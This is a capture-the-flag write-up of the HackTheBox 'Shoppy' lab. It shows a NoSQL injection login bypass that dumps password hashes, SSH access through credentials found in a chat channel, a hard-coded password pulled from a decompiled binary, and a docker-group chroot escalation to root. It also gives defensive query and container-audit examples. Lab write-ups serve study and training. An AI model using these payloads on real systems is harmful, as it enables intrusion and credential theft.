Shoppy-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory scanning, subdomain scanning, SQL (here NoSQL) injection, universal-password login bypass, sudo, binary decompilation, hard-coded secrets, the docker privileged group

Reference: https://blog.heapbytes.tech/rooms/hackthebox/easy/shoppy

Reference: https://0xdf.gitlab.io/2023/01/14/htb-shoppy.html

0x01 Obtaining user access

1. About the target

About Shoppy
Shoppy is an easy Linux machine. It hosts a website with a login panel and a user search function that is vulnerable to NoSQL injection, which an attacker can use to obtain the password hashes of every user. After cracking one user's hash, we can authenticate to the Mattermost chat running on the server and obtain SSH credentials for the user "jaeger". Reverse engineering a password manager binary allows lateral movement to the user "deploy", whose password it reveals. The "deploy" user turns out to be a member of the "docker" group, and that membership can be used to read the root flag.

2. First, check connectivity to the target

┌──(kali㉿offsec)-[~/Desktop]
└─$ ping 10.10.11.180 -c 4
PING 10.10.11.180 (10.10.11.180) 56(84) bytes of data.
64 bytes from 10.10.11.180: icmp_seq=1 ttl=63 time=141 ms
64 bytes from 10.10.11.180: icmp_seq=2 ttl=63 time=138 ms
64 bytes from 10.10.11.180: icmp_seq=3 ttl=63 time=130 ms
64 bytes from 10.10.11.180: icmp_seq=4 ttl=63 time=131 ms

--- 10.10.11.180 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3012ms
rtt min/avg/max/mdev = 129.998/135.048/140.680/4.476 ms

3. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.180 --min-rate=10000
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 15:12 CST
Nmap scan report for 10.10.11.180
Host is up (0.13s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat

Nmap done: 1 IP address (1 host up) scanned in 16.05 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80,9093 -sC -sV -Pn 10.10.11.180 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 15:13 CST
Nmap scan report for 10.10.11.180
Host is up (0.13s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open copycat?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Tue, 24 Sep 2024 07:03:02 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 3
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 3
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 1.7823e-05
| go_gc_duration_seconds{quantile="0.25"} 1.7823e-05
|_ go_gc_dur
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

4. Add the hostname revealed by the port scan (the redirect to shoppy.htb) to /etc/hosts

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.180 shoppy.htb" | sudo tee -a /etc/hosts
10.10.11.180 shoppy.htb

5. Then look at the website served under that hostname

http://shoppy.htb/

6. Use ffuf to enumerate the site's directories

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://shoppy.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://shoppy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

images [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 144ms]
# [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 144ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 145ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 200ms]
# [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 213ms]
# [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 213ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 219ms]
# on at least 2 different hosts [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 219ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 304ms]
[Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 301ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 305ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 305ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 305ms]
# Copyright 2007 James Fisher [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 308ms]
# [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 309ms]
login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 125ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 121ms]
assets [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 127ms]
css [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 130ms]
Login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 166ms]
js [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 197ms]
fonts [Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 123ms]
Admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 127ms]

7. A login page was found

http://shoppy.htb/login

8. There is actually a NoSQL injection here, but I'm not good enough at this and sqlmap didn't find it either

POST /login?error=WrongCredentials HTTP/1.1
Host: shoppy.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 70
Origin: http://shoppy.htb
Connection: close
Cookie: rl_user_id=RudderEncrypt%3AU2FsdGVkX19GV6NK0DxKjkw9TOqmyNCFZmtg6KKCdZ5PoCh34YJOGx%2FVvfk4Tyvx; rl_anonymous_id=RudderEncrypt%3AU2FsdGVkX19vUyluZooqYBAoFRbSX0U9FcIWMKmUNuMmm0phmDD5HHeS3EsezVG4j3SmktVo0o9SKB1lNCe0bQ%3D%3D; rl_group_id=RudderEncrypt%3AU2FsdGVkX19Od9IT1QBGmBOxy16K0LIvkmWd6bLg0Yw%3D; rl_trait=RudderEncrypt%3AU2FsdGVkX19N%2F9zK1I3qgOhRbSjBUI%2BmT1LXhV5YpN0%3D; rl_group_trait=RudderEncrypt%3AU2FsdGVkX1%2Btr%2FQPXf%2FEhg6ysL4ReI5quEwFjtvvdwQ%3D
Upgrade-Insecure-Requests: 1

{
"username": "admin' || 'a'=='a",
"password": "password"
}


HTTP/1.1 302 Found
Server: nginx/1.23.1
Date: Tue, 24 Sep 2024 07:55:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 56
Connection: close
Location: /admin
Vary: Accept
Set-Cookie: connect.sid=s%3AKXaUxPPJpq4HpOPBRRbFctuxROj7xNBf.L9TZ3qOvAVSKH5kSzcMmNdksGSjis8WZU1kwNlJrCp8; Path=/; HttpOnly

<p>Found. Redirecting to <a href="/admin">/admin</a></p>

9. That bypasses the login and lands on the admin panel

http://shoppy.htb/admin

10. Entering the same bypass payload in the user search box produces a downloadable file

http://shoppy.htb/admin/search-users?username=admin%27+%7C%7C+%27a%27%3D%3D%27a

11. Below is the content of the downloaded file

http://shoppy.htb/exports/export-search.json

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

josh
6ebcea65320589ca4f2f1ce039975995
remembermethisway
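The `admin' || 'a'=='a` payload in steps 8 and 10 works because the username is spliced into a JavaScript expression that is evaluated once per document, which is how a MongoDB `$where`-style query behaves (the Shoppy application's own code is not shown on this page, so that is an assumption consistent with the payload). What follows is an added example, not code from the Shoppy application: an in-memory stand-in for that evaluation, with the vulnerable lookup beside a hardened one; the user records and hash values are constructed placeholders.

```javascript
// Added example, not code from the Shoppy application.
// MongoDB's $where evaluates a JavaScript expression once per document with
// `this` bound to the document. findWhere() imitates that in memory so the
// effect of the payload can be seen without a database.
const users = [ // constructed sample records; hashes are placeholders
  { _id: "u1", username: "admin", password: "<hash placeholder>" },
  { _id: "u2", username: "josh",  password: "<hash placeholder>" },
];

function findWhere(collection, jsExpr) {
  // Same trust model as $where: the whole string is executed as code.
  const predicate = new Function("return (" + jsExpr + ");");
  return collection.filter((doc) => predicate.call(doc));
}

// Vulnerable pattern: user input spliced into the expression string.
// username = admin' || 'a'=='a  turns the filter into
//   this.username == 'admin' || 'a'=='a'   -> true for every document,
// which is why /login accepted it and /admin/search-users exported all users.
function findUsersVulnerable(username) {
  return findWhere(users, `this.username == '${username}'`);
}

// Hardened pattern: input is only ever compared as data, never evaluated.
// Rejecting non-strings also blocks operator objects such as {"$ne": ""}
// that a JSON request body could carry.
function findUsersHardened(username) {
  if (typeof username !== "string") return [];
  return users.filter((doc) => doc.username === username);
}

// Responses should never carry password hashes to the client; the export
// above leaked unsalted MD5 values that were trivially cracked.
function publicView(docs) {
  return docs.map(({ _id, username }) => ({ _id, username }));
}

function demo() {
  const payload = "admin' || 'a'=='a";
  return {
    vulnerable: publicView(findUsersVulnerable(payload)), // both users
    hardened: publicView(findUsersHardened(payload)),     // []
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```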

12. We now have some credentials, but progress stalled here; at this point the right move is actually to enumerate subdomains hard

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://shoppy.htb -H 'Host: FUZZ.shoppy.htb' -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 169

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://shoppy.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.shoppy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 169
________________________________________________

mattermost [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 142ms]

13. This subdomain enumeration step was a real trap; I tried several wordlists and none of them turned up the subdomain I was after. Strongly disliked.

14. Add the hosts entry locally

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.180 mattermost.shoppy.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.180 mattermost.shoppy.htb

15. Look at what is served under the subdomain

http://mattermost.shoppy.htb/login

http://mattermost.shoppy.htb/reset_password

16. Log in to this system with the credentials cracked above

http://mattermost.shoppy.htb/shoppy/channels/town-square

17. The boss's account is found

@jaeger  System Admin
@jess

18. Credentials are found

http://mattermost.shoppy.htb/shoppy/channels/deploy-machine

For the deploy machine, you can create an account with the following creds:
Username: Jaeger
Password: Sh0ppyBest@pp!
and deploy on it.

19. Then log in with the account we found. Note the case of the username: Linux usernames are case-sensitive, so the lowercase form is usually the one that works.

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh jaeger@10.10.11.180
jaeger@10.10.11.180's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:~$

20. Then grab the first flag, user.txt

jaeger@shoppy:~$ ls -la
total 96
drwxr-xr-x 19 jaeger jaeger 4096 Jul 22 2022 .
drwxr-xr-x 4 root root 4096 Jul 22 2022 ..
lrwxrwxrwx 1 jaeger jaeger 9 Jul 22 2022 .bash_history -> /dev/null
-rw-r--r-- 1 jaeger jaeger 220 Jul 22 2022 .bash_logout
-rw-r--r-- 1 jaeger jaeger 3723 Jul 22 2022 .bashrc
drwx------ 14 jaeger jaeger 4096 Jul 22 2022 .cache
drwx------ 12 jaeger jaeger 4096 Jul 22 2022 .config
lrwxrwxrwx 1 jaeger jaeger 9 Jul 22 2022 .dbshell -> /dev/null
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Desktop
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Documents
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Downloads
drwx------ 3 jaeger jaeger 4096 Jul 23 2022 .gnupg
drwxr-xr-x 3 jaeger jaeger 4096 Jul 22 2022 .local
-rw------- 1 jaeger jaeger 0 Jul 22 2022 .mongorc.js
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Music
drwxr-xr-x 4 jaeger jaeger 4096 Jul 22 2022 .npm
drwxr-xr-x 5 jaeger jaeger 4096 Jul 22 2022 .nvm
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Pictures
drwxr-xr-x 5 jaeger jaeger 4096 Sep 24 01:59 .pm2
-rw-r--r-- 1 jaeger jaeger 807 Jul 22 2022 .profile
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Public
drwxr-xr-x 7 jaeger jaeger 4096 Jul 23 2022 ShoppyApp
-rwxr--r-- 1 jaeger jaeger 130 Jul 22 2022 shoppy_start.sh
drwx------ 2 jaeger jaeger 4096 Jul 22 2022 .ssh
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Templates
-rw-r----- 1 root jaeger 33 Sep 24 01:59 user.txt
drwxr-xr-x 2 jaeger jaeger 4096 Jul 22 2022 Videos
jaeger@shoppy:~$ ls -la ../
total 16
drwxr-xr-x 4 root root 4096 Jul 22 2022 .
drwxr-xr-x 19 root root 4096 Sep 12 2022 ..
drwxr-xr-x 3 deploy deploy 4096 Jul 23 2022 deploy
drwxr-xr-x 19 jaeger jaeger 4096 Jul 22 2022 jaeger
jaeger@shoppy:~$ ls -la ../deploy
total 52
drwxr-xr-x 3 deploy deploy 4096 Jul 23 2022 .
drwxr-xr-x 4 root root 4096 Jul 22 2022 ..
lrwxrwxrwx 1 deploy deploy 9 Jul 22 2022 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy 220 Mar 27 2022 .bash_logout
-rw-r--r-- 1 deploy deploy 3526 Mar 27 2022 .bashrc
-rw------- 1 deploy deploy 56 Jul 22 2022 creds.txt
lrwxrwxrwx 1 deploy deploy 9 Jul 23 2022 .dbshell -> /dev/null
drwx------ 3 deploy deploy 4096 Jul 23 2022 .gnupg
-rwxr--r-- 1 deploy deploy 18440 Jul 22 2022 password-manager
-rw------- 1 deploy deploy 739 Feb 1 2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy 807 Mar 27 2022 .profile
jaeger@shoppy:~$
jaeger@shoppy:~$ cat user.txt
696b82cc1ca34fefee86a9fcc8341630
jaeger@shoppy:~$

0x02 Obtaining root access

21. Enumeration shows that the current user may run a command via sudo as another user

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager


jaeger@shoppy:~$

22. Trying it: the password we have is not accepted

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sh0ppyBest@pp!
Access denied! This incident will be reported !
jaeger@shoppy:~$

23. Copy the binary to the local machine

┌──(kali㉿offsec)-[~/Desktop]
└─$ scp jaeger@shoppy.htb:/home/deploy/password-manager .
The authenticity of host 'shoppy.htb (10.10.11.180)' can't be established.
ED25519 key fingerprint is SHA256:RISsnnLs1eloK7XlOTr2TwStHh2R8hui07wd1iFyB+8.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:21: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shoppy.htb' (ED25519) to the list of known hosts.
jaeger@shoppy.htb's password:
password-manager 100% 18KB 20.7KB/s 00:00

24. Quick check of the file type

┌──(kali㉿offsec)-[~/Desktop]
└─$ file password-manager
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped

25. This part is a bit beyond my skills, but with careful analysis there is still something to be made out

26. Install the decompiler

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo apt install ghidra

27. Decompile the file and read the result

bool main(void)

{
  int iVar1;
  basic_ostream *pbVar2;
  basic_string<> local_68 [32];
  basic_string local_48 [47];
  allocator<char> local_19 [9];

  pbVar2 = std::operator<<((basic_ostream *)std::cout,"Welcome to Josh password manager!");
  std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar2,std::endl<>);
  std::operator<<((basic_ostream *)std::cout,"Please enter your master password: ");
  std::__cxx11::basic_string<>::basic_string();
  /* try { // try from 00101263 to 00101267 has its CatchHandler @ 001013cb */
  std::operator>>((basic_istream *)std::cin,local_48);
  std::allocator<char>::allocator();
  /* try { // try from 00101286 to 0010128a has its CatchHandler @ 001013a9 */
  std::__cxx11::basic_string<>::basic_string((char *)local_68,(allocator *)&DAT_0010205c);
  std::allocator<char>::~allocator(local_19);
  /* try { // try from 001012a5 to 00101387 has its CatchHandler @ 001013ba */
  std::__cxx11::basic_string<>::operator+=(local_68,"S");
  std::__cxx11::basic_string<>::operator+=(local_68,"a");
  std::__cxx11::basic_string<>::operator+=(local_68,"m");
  std::__cxx11::basic_string<>::operator+=(local_68,"p");
  std::__cxx11::basic_string<>::operator+=(local_68,"l");
  std::__cxx11::basic_string<>::operator+=(local_68,"e");
  iVar1 = std::__cxx11::basic_string<>::compare(local_48);
  if (iVar1 != 0) {
    pbVar2 = std::operator<<((basic_ostream *)std::cout,
                             "Access denied! This incident will be reported !");
    std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar2,std::endl<>);
  }
  else {
    pbVar2 = std::operator<<((basic_ostream *)std::cout,"Access granted! Here is creds !");
    std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar2,std::endl<>);
    system("cat /home/deploy/creds.txt");
  }
  std::__cxx11::basic_string<>::~basic_string(local_68);
  std::__cxx11::basic_string<>::~basic_string((basic_string<> *)local_48);
  return iVar1 != 0;
}

28. The thing to spot is the hard-coded master password "Sample", built up one character at a time with operator+= (which is also why a plain strings search would not show it). Use it.

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
[sudo] password for jaeger:
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
jaeger@shoppy:~$

29. We now have the deploy user's password

30. Switch to that user and enumerate

jaeger@shoppy:~$ su deploy
Password:
$
$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
$ pwd
/home/jaeger
$ cd ~
$ pwd
/home/deploy
$ ls -la
total 52
drwxr-xr-x 3 deploy deploy 4096 Jul 23 2022 .
drwxr-xr-x 4 root root 4096 Jul 22 2022 ..
lrwxrwxrwx 1 deploy deploy 9 Jul 22 2022 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy 220 Mar 27 2022 .bash_logout
-rw-r--r-- 1 deploy deploy 3526 Mar 27 2022 .bashrc
-rw------- 1 deploy deploy 56 Jul 22 2022 creds.txt
lrwxrwxrwx 1 deploy deploy 9 Jul 23 2022 .dbshell -> /dev/null
drwx------ 3 deploy deploy 4096 Jul 23 2022 .gnupg
-rwxr--r-- 1 deploy deploy 18440 Jul 22 2022 password-manager
-rw------- 1 deploy deploy 739 Feb 1 2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy 807 Mar 27 2022 .profile
$ cat /etc/passwd | grep "deploy"
deploy:x:1001:1001::/home/deploy:/bin/sh
$
$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest d7d3d98c851f 2 years ago 5.53MB
$

31. This user is in the docker group, so the privileged-group technique from the HTB Academy module applies directly and takes us the rest of the way

$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
# lss
sh: 3: lss: not found
# ls
root.txt
# cat root ^H^H^H^H^H
cat: root: No such file or directory
cat: ''$'\b\b\b\b\b': No such file or directory
# cat root.txt
ba39063a210d2db8385c84186d6e8a8c
#
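The step above works because membership in the docker group is effectively root: any member can bind-mount the host's / into a container and chroot into it, so the group should be treated like sudo and its containers watched. As an added defensive example (not part of this writeup or of the HTB Academy material it cites), the following audits `docker inspect` JSON for exactly that pattern; the inspect documents are constructed, but the field names (`HostConfig.Privileged`, `Mounts[].Source`, `Config.Cmd`) are the ones the Docker API returns.

```javascript
// Added example for defenders, not from the writeup. Flags containers whose
// configuration hands over the host root filesystem the way the docker-group
// chroot trick above does. Feed it the JSON from `docker inspect $(docker ps -q)`.
const SENSITIVE_HOST_PATHS = ["/", "/etc", "/root", "/var/run/docker.sock"];

function normalizePath(p) {
  const trimmed = String(p).replace(/\/+$/, "");
  return trimmed === "" ? "/" : trimmed;
}

function auditContainer(c) {
  const findings = [];
  const hc = c.HostConfig || {};
  if (hc.Privileged) findings.push("privileged container");
  if (hc.PidMode === "host") findings.push("shares host PID namespace");
  for (const m of c.Mounts || []) {
    if (m.Type !== "bind") continue;                 // volumes and tmpfs are not host paths
    const src = normalizePath(m.Source);
    if (SENSITIVE_HOST_PATHS.includes(src)) {
      findings.push(`bind mount of host ${src} at ${m.Destination}${m.RW ? " (rw)" : ""}`);
    }
  }
  const cmd = [...(c.Config?.Entrypoint || []), ...(c.Config?.Cmd || [])].join(" ");
  if (/\bchroot\b/.test(cmd)) findings.push(`chroot in container command: ${cmd}`);
  return findings;
}

// Returns only the containers that produced at least one finding.
function auditAll(inspectDocs) {
  return inspectDocs
    .map((c) => ({ name: c.Name, findings: auditContainer(c) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed inspect documents: the first mirrors the command used above,
// the second is a harmless container that must produce no findings.
const sampleInspect = [
  {
    Name: "/suspicious",
    Config: { Image: "alpine", Entrypoint: null, Cmd: ["chroot", "/mnt", "sh"] },
    HostConfig: { Privileged: false, PidMode: "", Binds: ["/:/mnt"] },
    Mounts: [{ Type: "bind", Source: "/", Destination: "/mnt", RW: true }],
  },
  {
    Name: "/webapp",
    Config: { Image: "nginx", Entrypoint: null, Cmd: ["nginx", "-g", "daemon off;"] },
    HostConfig: { Privileged: false, PidMode: "", Binds: ["/srv/www:/usr/share/nginx/html:ro"] },
    Mounts: [{ Type: "bind", Source: "/srv/www", Destination: "/usr/share/nginx/html", RW: false }],
  },
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditAll(sampleInspect), null, 2));
}
```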

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/496


Shoppy-htb-writeup
https://sh1yan.top/2024/09/24/Shoppy-htb-writeup/
Author: shiyan
Published: 24 September 2024
License